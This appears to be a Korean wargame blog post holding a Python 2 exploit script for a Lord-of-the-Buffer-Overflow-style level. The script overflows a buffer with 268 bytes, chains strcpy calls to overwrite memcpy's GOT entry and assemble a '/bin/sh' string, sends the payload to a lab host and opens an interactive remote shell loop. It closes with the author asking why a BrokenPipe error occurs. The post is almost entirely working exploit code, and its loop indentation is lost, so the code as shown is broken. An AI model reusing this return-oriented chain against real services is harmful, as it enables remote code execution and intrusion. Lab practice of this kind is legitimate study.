################

import time

import os

from socket import *

from struct import pack


p = lambda x : pack("<L", x) 

################


strcpy = 0x8048438

memcpy = 0x8048418

memcpy_got = 0x8049850

binsh = 0x8049878

str1 = 0x8048138

str2 = 0x80482b4

str3 = 0x804817c

str4 = 0x80484c8+8

str_slash = 0x8048114

str5 = 0x8048117

str6 = 0x8048116

str7 = 0x8048114+10

str8 = 0x8048746

str9 = 0x80481b8

ppr = 0x80484f3


################


payload = ''

payload += "\x41"*268

payload += p(strcpy)

payload += p(ppr)

payload += p(memcpy_got)

payload += p(str1)

payload += p(strcpy)

payload += p(ppr)

payload += p(memcpy_got+1)

payload += p(str2)

payload += p(strcpy)

payload += p(ppr)

payload += p(memcpy_got+2)

payload += p(str3)

payload += p(strcpy)

payload += p(ppr)

payload += p(memcpy_got+3)

payload += p(str4)

payload += p(strcpy)

payload += p(ppr)

payload += p(binsh+1)

payload += p(str_slash)

payload += p(strcpy)

payload += p(ppr)

payload += p(binsh+2)

payload += p(str5)

payload += p(strcpy)

payload += p(ppr)

payload += p(binsh+3)

payload += p(str6)

payload += p(strcpy)

payload += p(ppr)

payload += p(binsh+4)

payload += p(str_slash)

payload += p(strcpy)

payload += p(ppr)

payload += p(binsh+5)

payload += p(str7)

payload += p(strcpy)

payload += p(ppr)

payload += p(binsh+6)

payload += p(str8)

payload += p(strcpy)

payload += p(ppr)

payload += p(binsh+7)

payload += p(str9)

payload += p(memcpy)

payload += "\x41"*4

payload += p(binsh)


###############


s = socket(AF_INET, SOCK_STREAM)

s.connect(('192.168.16.135',8888))

s.send(payload+'\n')

print s.recv(1024)

while True:

cmd = raw_input('$ ')

if cmd == 'exit':

s.close()

break

s.send(cmd+'\n')

result = s.recv(1024)

print result

time.sleep(2)

s.close() 


###############



익스플로잇에서 한참 삽질하고 있는데 s.send(cmd+'\n') 에서 BrokenPipe 에러가 나더라구요..

왜그런지 아시는분 도와주시면 감사하겠습니다..


'Wargame > LOB[FC]' 카테고리의 다른 글

[BOF원정대/FC3] hell_fire -> evil_wizard  (0) 2013.09.28
Posted by xer0s :